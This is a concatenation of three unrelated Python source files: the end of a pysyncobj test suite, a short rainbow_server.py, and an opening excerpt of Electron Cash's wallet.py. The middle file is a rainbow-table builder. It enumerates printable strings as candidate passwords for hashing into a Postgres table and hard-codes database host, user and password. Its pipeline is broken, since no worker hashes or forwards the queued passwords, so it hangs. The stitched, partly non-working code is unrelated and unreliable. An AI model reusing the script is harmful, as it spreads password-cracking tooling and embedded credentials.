data = {'foo': 'bar', 'command': b'\xfa', 'entries': [b'\xfb', b'\xfc']}
python2_cpickle = b'\x80\x02}q\x01(U\x03fooq\x02U\x03barq\x03U\x07commandq\x04U\x01\xfaU\x07entriesq\x05]q\x06(U\x01\xfbU\x01\xfceu.'
python2_pickle = b'\x80\x02}q\x00(U\x03fooq\x01U\x03barq\x02U\x07commandq\x03U\x01\xfaq\x04U\x07entriesq\x05]q\x06(U\x01\xfbq\x07U\x01\xfcq\x08eu.'
python3_pickle = b'\x80\x02}q\x00(X\x03\x00\x00\x00fooq\x01X\x03\x00\x00\x00barq\x02X\x07\x00\x00\x00commandq\x03c_codecs\nencode\nq\x04X\x02\x00\x00\x00\xc3\xbaq\x05X\x06\x00\x00\x00latin1q\x06\x86q\x07Rq\x08X\x07\x00\x00\x00entriesq\t]q\n(h\x04X\x02\x00\x00\x00\xc3\xbbq\x0bh\x06\x86q\x0cRq\rh\x04X\x02\x00\x00\x00\xc3\xbcq\x0eh\x06\x86q\x0fRq\x10eu.'
python2_cpickle_data = pickle.loads(python2_cpickle)
assert data == python2_cpickle_data, 'Failed to unpickle data pickled by python2 cPickle'
python2_pickle_data = pickle.loads(python2_pickle)
assert data == python2_pickle_data, 'Failed to unpickle data pickled by python2 pickle'
python3_pickle_data = pickle.loads(python3_pickle)
assert data == python3_pickle_data, 'Failed to unpickle data pickled by python3 pickle'
class TestConsumer1(SyncObjConsumer):
def __init__(self):
super(TestConsumer1, self).__init__()
self.__counter = 0
@replicated
def add(self, value):
self.__counter += value
@replicated
def set(self, value):
self.__counter = value
def get(self):
return self.__counter
class TestConsumer2(SyncObjConsumer):
def __init__(self):
super(TestConsumer2, self).__init__()
self.__values = {}
@replicated
def set(self, key, value):
self.__values[key] = value
def get(self, key):
return self.__values.get(key)
def test_consumers():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
c11 = TestConsumer1()
c12 = TestConsumer1()
c13 = TestConsumer2()
c21 = TestConsumer1()
c22 = TestConsumer1()
c23 = TestConsumer2()
c31 = TestConsumer1()
c32 = TestConsumer1()
c33 = TestConsumer2()
o1 = TestObj(a[0], [a[1], a[2]], consumers=[c11, c12, c13])
o2 = TestObj(a[1], [a[0], a[2]], consumers=[c21, c22, c23])
o3 = TestObj(a[2], [a[0], a[1]], consumers=[c31, c32, c33])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
c11.set(42)
c11.add(10)
c12.add(15)
c13.set('testKey', 'testValue')
doTicks(objs, 10.0, stopFunc=lambda: c21.get() == 52 and c22.get() == 15 and c23.get('testKey') == 'testValue')
assert c21.get() == 52
assert c22.get() == 15
assert c23.get('testKey') == 'testValue'
o1.forceLogCompaction()
o2.forceLogCompaction()
doTicks(objs, 0.5)
objs = [o1, o2, o3]
doTicks(objs, 10.0, stopFunc=lambda: c31.get() == 52 and c32.get() == 15 and c33.get('testKey') == 'testValue')
assert c31.get() == 52
assert c32.get() == 15
assert c33.get('testKey') == 'testValue'
o1.destroy()
o2.destroy()
o3.destroy()
def test_batteriesCommon():
d1 = ReplDict()
l1 = ReplLockManager(autoUnlockTime=30.0)
d2 = ReplDict()
l2 = ReplLockManager(autoUnlockTime=30.0)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.AUTO_TICK_1, consumers=[d1, l1])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.AUTO_TICK_1, consumers=[d2, l2])
doAutoTicks(10.0, stopFunc=lambda: o1.isReady() and o2.isReady())
assert o1.isReady() and o2.isReady()
d1.set('testKey', 'testValue', sync=True)
doAutoTicks(3.0, stopFunc=lambda: d2.get('testKey') == 'testValue')
assert d2['testKey'] == 'testValue'
d2.pop('testKey', sync=True)
doAutoTicks(3.0, stopFunc=lambda: d1.get('testKey') == None)
assert d1.get('testKey') == None
assert l1.tryAcquire('test.lock1', sync=True) == True
assert l2.tryAcquire('test.lock1', sync=True) == False
assert l2.isAcquired('test.lock1') == False
l1id = l1._ReplLockManager__selfID
l1._ReplLockManager__lockImpl.prolongate(l1id, 0, _doApply=True)
l1.release('test.lock1', sync=True)
assert l2.tryAcquire('test.lock1', sync=True) == True
assert d1.setdefault('keyA', 'valueA', sync=True) == 'valueA'
assert d2.setdefault('keyA', 'valueB', sync=True) == 'valueA'
d2.pop('keyA', sync=True)
assert d2.setdefault('keyA', 'valueB', sync=True) == 'valueB'
o1.destroy()
o2.destroy()
l1.destroy()
l2.destroy()
def test_ReplCounter():
c = ReplCounter()
c.set(42, _doApply=True)
assert c.get() == 42
c.add(10, _doApply=True)
assert c.get() == 52
c.sub(20, _doApply=True)
assert c.get() == 32
c.inc(_doApply=True)
assert c.get() == 33
def test_ReplList():
l = ReplList()
l.reset([1, 2, 3], _doApply=True)
assert l.rawData() == [1, 2, 3]
l.set(1, 10, _doApply=True)
assert l.rawData() == [1, 10, 3]
l.append(42, _doApply=True)
assert l.rawData() == [1, 10, 3, 42]
l.extend([5, 6], _doApply=True)
assert l.rawData() == [1, 10, 3, 42, 5, 6]
l.insert(2, 66, _doApply=True)
assert l.rawData() == [1, 10, 66, 3, 42, 5, 6]
l.remove(66, _doApply=True)
assert l.rawData() == [1, 10, 3, 42, 5, 6]
l.pop(1, _doApply=True)
assert l.rawData() == [1, 3, 42, 5, 6]
l.sort(reverse=True, _doApply=True)
assert l.rawData() == [42, 6, 5, 3, 1]
assert l.index(6) == 1
assert l.count(42) == 1
assert l.get(2) == 5
assert l[4] == 1
assert len(l) == 5
l.__setitem__(0, 43, _doApply=True)
assert l[0] == 43
def test_ReplDict():
d = ReplDict()
d.reset({
1: 1,
2: 22,
}, _doApply=True)
assert d.rawData() == {
1: 1,
2: 22,
}
d.__setitem__(1, 10, _doApply=True)
assert d.rawData() == {
1: 10,
2: 22,
}
d.set(1, 20, _doApply=True)
assert d.rawData() == {
1: 20,
2: 22,
}
assert d.setdefault(1, 50, _doApply=True) == 20
assert d.setdefault(3, 50, _doApply=True) == 50
d.update({
5: 5,
6: 7,
}, _doApply=True)
assert d.rawData() == {
1: 20,
2: 22,
3: 50,
5: 5,
6: 7,
}
assert d.pop(3, _doApply=True) == 50
assert d.pop(6, _doApply=True) == 7
assert d.pop(6, _doApply=True) == None
assert d.pop(6, 0, _doApply=True) == 0
assert d.rawData() == {
1: 20,
2: 22,
5: 5,
}
assert d[1] == 20
assert d.get(2) == 22
assert d.get(22) == None
assert d.get(22, 10) == 10
assert len(d) == 3
assert 2 in d
assert 22 not in d
assert sorted(d.keys()) == [1, 2, 5]
assert sorted(d.values()) == [5, 20, 22]
assert d.items() == d.rawData().items()
d.clear(_doApply=True)
assert len(d) == 0
def test_ReplSet():
s = ReplSet()
s.reset({1, 4}, _doApply=True)
assert s.rawData() == {1, 4}
s.add(10, _doApply=True)
assert s.rawData() == {1, 4, 10}
s.remove(1, _doApply=True)
s.discard(10, _doApply=True)
assert s.rawData() == {4}
assert s.pop(_doApply=True) == 4
s.add(48, _doApply=True)
s.update({9, 2, 3}, _doApply=True)
assert s.rawData() == {9, 2, 3, 48}
assert len(s) == 4
assert 9 in s
assert 42 not in s
s.clear(_doApply=True)
assert len(s) == 0
assert 9 not in s
def test_ReplQueue():
q = ReplQueue()
q.put(42, _doApply=True)
q.put(33, _doApply=True)
q.put(14, _doApply=True)
assert q.get(_doApply=True) == 42
assert q.qsize() == 2
assert len(q) == 2
assert q.empty() == False
assert q.get(_doApply=True) == 33
assert q.get(-1, _doApply=True) == 14
assert q.get(_doApply=True) == None
assert q.get(-1, _doApply=True) == -1
assert q.empty()
q = ReplQueue(3)
q.put(42, _doApply=True)
q.put(33, _doApply=True)
assert q.full() == False
assert q.put(14, _doApply=True) == True
assert q.full() == True
assert q.put(19, _doApply=True) == False
assert q.get(_doApply=True) == 42
def test_ReplPriorityQueue():
q = ReplPriorityQueue()
q.put(42, _doApply=True)
q.put(14, _doApply=True)
q.put(33, _doApply=True)
assert q.get(_doApply=True) == 14
assert q.qsize() == 2
assert len(q) == 2
assert q.empty() == False
assert q.get(_doApply=True) == 33
assert q.get(-1, _doApply=True) == 42
assert q.get(_doApply=True) == None
assert q.get(-1, _doApply=True) == -1
assert q.empty()
q = ReplPriorityQueue(3)
q.put(42, _doApply=True)
q.put(33, _doApply=True)
assert q.full() == False
assert q.put(14, _doApply=True) == True
assert q.full() == True
assert q.put(19, _doApply=True) == False
assert q.get(_doApply=True) == 14
# https://github.com/travis-ci/travis-ci/issues/8695
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('TRAVIS') == 'true', reason='temporary disabled for windows')
def test_ipv6():
random.seed(42)
a = [getNextAddr(ipv6=True), getNextAddr(ipv6=True)]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_localhost():
random.seed(42)
a = [getNextAddr(isLocalhost=True), getNextAddr(isLocalhost=True)]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 3.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_leaderFallback():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], leaderFallbackTimeout=30.0)
o2 = TestObj(a[1], [a[0]], leaderFallbackTimeout=30.0)
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 5.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1._SyncObj__conf.leaderFallbackTimeout = 3.0
o2._SyncObj__conf.leaderFallbackTimeout = 3.0
doTicks([o for o in objs if o._isLeader()], 2.0)
assert o1._isLeader() or o2._isLeader()
doTicks([o for o in objs if o._isLeader()], 2.0)
assert not o1._isLeader() and not o2._isLeader()
class ZeroDeployConsumerAlpha(SyncObjConsumer):
@replicated(ver=1)
def someMethod(self):
pass
@replicated
def methodTwo(self):
pass
class ZeroDeployConsumerBravo(SyncObjConsumer):
@replicated
def alphaMethod(self):
pass
@replicated(ver=3)
def methodTwo(self):
pass
class ZeroDeployTestObj(SyncObj):
def __init__(self, selfAddr, otherAddrs, consumers):
cfg = SyncObjConf(autoTick=False)
super(ZeroDeployTestObj, self).__init__(selfAddr, otherAddrs, cfg, consumers=consumers)
@replicated
def someMethod(self):
pass
@replicated
def otherMethod(self):
pass
@replicated(ver=1)
def thirdMethod(self):
pass
@replicated(ver=2)
def lastMethod(self):
pass
@replicated(ver=3)
def lastMethod(self):
pass
def test_zeroDeployVersions():
random.seed(42)
a = [getNextAddr()]
cAlpha = ZeroDeployConsumerAlpha()
cBravo = ZeroDeployConsumerBravo()
o1 = ZeroDeployTestObj(a[0], [], [cAlpha, cBravo])
assert hasattr(o1, 'otherMethod_v0') == True
assert hasattr(o1, 'lastMethod_v2') == True
assert hasattr(o1, 'lastMethod_v3') == True
assert hasattr(o1, 'lastMethod_v4') == False
assert hasattr(cAlpha, 'methodTwo_v0') == True
assert hasattr(cBravo, 'methodTwo_v3') == True
assert o1._methodToID['lastMethod_v2'] > o1._methodToID['otherMethod_v0']
assert o1._methodToID['lastMethod_v3'] > o1._methodToID['lastMethod_v2']
assert o1._methodToID['lastMethod_v3'] > o1._methodToID['someMethod_v0']
assert o1._methodToID['thirdMethod_v1'] > o1._methodToID['someMethod_v0']
assert o1._methodToID['lastMethod_v2'] > o1._methodToID[(id(cAlpha), 'methodTwo_v0')]
assert o1._methodToID[id(cBravo), 'methodTwo_v3'] > o1._methodToID['lastMethod_v2']
assert 'someMethod' not in o1._methodToID
assert 'thirdMethod' not in o1._methodToID
assert 'lastMethod' not in o1._methodToID
def test_dnsResolverBug(monkeypatch):
monkeypatch.setattr(dns_resolver, "monotonicTime", lambda: 0.0)
resolver = dns_resolver.DnsCachingResolver(600, 30)
ip = resolver.resolve('localhost')
assert ip == '127.0.0.1'
class MockSocket(object):
def __init__(self, socket, numSuccessSends):
self.socket = socket
self.numSuccessSends = numSuccessSends
def send(self, data):
self.numSuccessSends -= 1
if self.numSuccessSends <= 0:
return -100500
return self.socket.send(data)
def close(self):
return self.socket.close()
def getsockopt(self, *args, **kwargs):
return self.socket.getsockopt(*args, **kwargs)
def recv(self, *args, **kwargs):
return self.socket.recv(*args, **kwargs)
def setMockSocket(o, numSuccess = 0):
for readonlyNode in o._SyncObj__readonlyNodes:
for node, conn in o._SyncObj__transport._connections.items():
if node == readonlyNode:
origSocket = conn._TcpConnection__socket
conn._TcpConnection__socket = MockSocket(origSocket, numSuccess)
#origSend = origSocket.send
#origSocket.send = lambda x: mockSend(origSend, x)
#print("Set mock send")
def test_readOnlyDrop():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
o3 = TestObj(None, [a[0], a[1]])
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350 and o3.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
assert o3.getCounter() == 350
setMockSocket(o1, 1)
setMockSocket(o2, 1)
global _g_numSuccessSends
_g_numSuccessSends = 0
for i in range(150):
o1.addValue(1)
for i in range(200):
o2.addValue(1)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 700 and o2.getCounter() == 700)
assert o1.getCounter() == 700
assert o2.getCounter() == 700
o1._destroy()
o2._destroy()
o3._destroy()
def test_filterParners():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[0]])
assert len(o1._SyncObj__otherNodes) == 1
|
rainbow_server.py
|
#!/usr/bin/python
import crypt
import psycopg2
import multiprocessing
from string import letters,digits,printable
from itertools import product
from threading import Thread
def generate_data(q, maxlen=2, minlen=1):
""" create base passwords for consumer threads to crypt
"""
alphabet = 'ab'
alphabet = printable
for l in range(minlen, maxlen+1):
for s in product(alphabet, repeat=l):
q.put( ''.join(s) )
def record_data(q):
""" pull data from the queue and add to database
"""
db = psycopg2.connect(
dbname='rainbow',
host='humpy',
user='rainbow',
password='bowrain',
);
cur = db.cursor();
while True:
vals = q.get()
for val in vals:
#print val['h']
try:
cur.execute("""
INSERT INTO three_des
(pass, hash)
VALUES(%(p)s, %(h)s)
""",
val
)
except:
print "Failed to insert"
db.commit()
q.task_done()
passwords = multiprocessing.JoinableQueue(maxsize=0)
hashes = multiprocessing.JoinableQueue(maxsize=0)
# only one generator
for i in range(1):
t = multiprocessing.Process( target=generate_data, args=(passwords, 5, 1))
t.start()
# only one data recorder?
for i in range(2):
t = multiprocessing.Process( target=record_data, args=(hashes,))
t.start()
passwords.join()
print "all passwords consumed"
hashes.join()
print "all hashes done"
for p in multiprocessing.active_children():
print "joining process " , p.pid
if not p.join(2):
print "terminating process " , p.pid
p.terminate()
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import re
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee, PrintError,
UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string,
TimeoutException, is_verbose)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .paymentrequest import InvoiceStore
from .contacts import Contacts
from . import cashacct
from .slp import SlpMessage, SlpParsingError, SlpUnsupportedSlpTokenType, SlpNoMintingBatonFound, OpreturnError
from . import slp_validator_0x01, slp_validator_0x01_nft1
from .slp_graph_search import slp_gs_mgr
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.pre_release_tag = PRE_RELEASE_TAG
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
finalization_print_error(self.cashacct) # debug object lifecycle
# slp graph databases for token type 1 and NFT1
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@property
def is_slp(self):
''' Note that the various Slp_* classes explicitly write to storage
to set the proper wallet_type on construction unconditionally, so
this should always be valid for SLP wallets. '''
return "slp_" in self.storage.get('wallet_type', '')
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slpv1_validity = self.storage.get('slpv1_validity', {})
self.token_types = self.storage.get('token_types', {})
self.tx_tokinfo = self.storage.get('tx_tokinfo', {})
# load up slp_txo as defaultdict-of-defaultdict-of-dicts
self._slp_txo = defaultdict(lambda: defaultdict(dict))
for addr, addrdict in self.to_Address_dict(self.storage.get('slp_txo',{})).items():
for txid, txdict in addrdict.items():
# need to do this iteration since json stores int keys as decimal strings.
self._slp_txo[addr][txid] = {int(idx):d for idx,d in txdict.items()}
